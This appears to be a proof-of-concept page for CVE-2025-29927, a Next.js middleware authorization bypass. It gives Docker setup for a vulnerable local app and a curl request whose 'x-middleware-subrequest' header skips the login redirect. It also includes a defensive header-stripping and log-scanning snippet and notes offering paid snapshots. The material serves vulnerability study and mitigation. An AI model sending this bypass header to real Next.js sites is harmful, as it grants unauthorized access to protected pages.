Related vulnerability
Description
Research on Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.
Introduction
# Next.js Middleware Vulnerability Research (CVE-2025-29927)
This repository demonstrates a critical **vulnerability in Next.js** middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for **authorization bypass**, **CSP bypass**, and potential **DoS attacks** through cache-poisoning. The issue originates in the way the `x-middleware-subrequest` header is handled, allowing attackers to bypass middleware protection mechanisms.
This proof of concept is specific to the vulnerability as it appears in **v12**.
## Usage
### Environment setup
Set up the vulnerable environment using docker and the files from this repo by running:
```bash
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```
### Exploit
This repository ships an `exploit.sh` script that tests exploitation of the vulnerability. To run it:
```bash
chmod +x exploit.sh
./exploit.sh
```
Additionally, you can test exploitation of the vulnerability manually with the following requests:
1. Request the admin page without authentication. You should get a redirection to the `login` page.
```bash
curl -i http://localhost:3000/admin
```
2. Request the page without authentication but using the `x-middleware-subrequest` header. You should be able to bypass the authentication page.
```bash
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
```
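The two requests above differ only in the presence of the `x-middleware-subrequest` header, which makes the bypass easy to filter and to find in logs. The following is an added defensive example, not code from the l1uk/nextjs-middleware-exploit repository: it implements the advisory's interim mitigation of not letting external requests that carry this header reach the application, and scans access-log style records for attempts. The function names (`stripSubrequestHeader`, `findBypassAttempts`) and the sample records are constructed for illustration.

```javascript
// Added example (not part of the nextjs-middleware-exploit repository).
// Defensive handling of the internal `x-middleware-subrequest` header
// behind CVE-2025-29927: strip it from inbound requests at the edge and
// surface attempts for logging/alerting. Upgrading Next.js remains the fix;
// this mirrors the advisory's guidance for deployments that cannot yet.

const INTERNAL_HEADER = 'x-middleware-subrequest';

/**
 * Return a copy of `headers` without the internal subrequest header.
 * HTTP header names are case-insensitive, so the match is lowercased.
 * Also reports whether anything was stripped and the value seen, so a
 * reverse proxy can log the attempt before forwarding the cleaned request.
 */
function stripSubrequestHeader(headers) {
  const cleaned = {};
  let stripped = false;
  let value = null;
  for (const [name, v] of Object.entries(headers)) {
    if (name.toLowerCase() === INTERNAL_HEADER) {
      stripped = true;
      // Node may present repeated headers as arrays; normalise to a string.
      value = Array.isArray(v) ? v.join(', ') : String(v);
      continue;
    }
    cleaned[name] = v;
  }
  return { headers: cleaned, stripped, value };
}

/**
 * Scan access-log style records ({ ts, ip, method, path, headers }) and
 * return a compact list of the requests that carried the header, which
 * from an external client is always an anomaly worth investigating.
 */
function findBypassAttempts(records) {
  const hits = [];
  for (const r of records) {
    const check = stripSubrequestHeader(r.headers);
    if (check.stripped) {
      hits.push({ ts: r.ts, ip: r.ip, method: r.method, path: r.path, value: check.value });
    }
  }
  return hits;
}

// Constructed sample records (not real traffic); the second one mimics the
// bypass request shown in the README above.
const SAMPLE_RECORDS = [
  { ts: '2025-03-24T10:00:00Z', ip: '203.0.113.7', method: 'GET', path: '/admin',
    headers: { host: 'localhost:3000', 'user-agent': 'curl/8.0' } },
  { ts: '2025-03-24T10:00:05Z', ip: '203.0.113.7', method: 'GET', path: '/admin',
    headers: { host: 'localhost:3000', 'X-Middleware-Subrequest': 'pages/_middleware' } },
  { ts: '2025-03-24T10:01:00Z', ip: '198.51.100.2', method: 'GET', path: '/about',
    headers: { host: 'localhost:3000' } },
];

// Stand-alone run: list the suspicious requests found in the sample.
console.log(JSON.stringify(findBypassAttempts(SAMPLE_RECORDS), null, 2));
```

In a Node reverse proxy, `stripSubrequestHeader(req.headers).headers` would be the header set forwarded upstream; the same idea applies to any edge (nginx, a CDN rule) that can drop a named request header. Note that stripping only protects the path through that edge, so the application itself still needs the patched Next.js release.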
## Security Advisory
- **CVE-2025-29927**: [Security Advisory Link](https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw)
File snapshot
```text
[4.0K] /data/pocs/03c9ebc5ffbfe0381ab55b9ddd8f87f48c6425e1
├── [ 365]  Dockerfile
├── [ 665]  exploit.sh
├── [  46]  next.config.js
├── [ 242]  package.json
├── [4.0K]  pages
│   ├── [ 369]  about.js
│   ├── [ 157]  admin.js
│   ├── [ 375]  index.js
│   ├── [ 550]  login.js
│   └── [1.3K]  _middleware.js
├── [1.6K]  README.md
└── [4.0K]  styles
    └── [ 119]  global.css

2 directories, 11 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, please send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.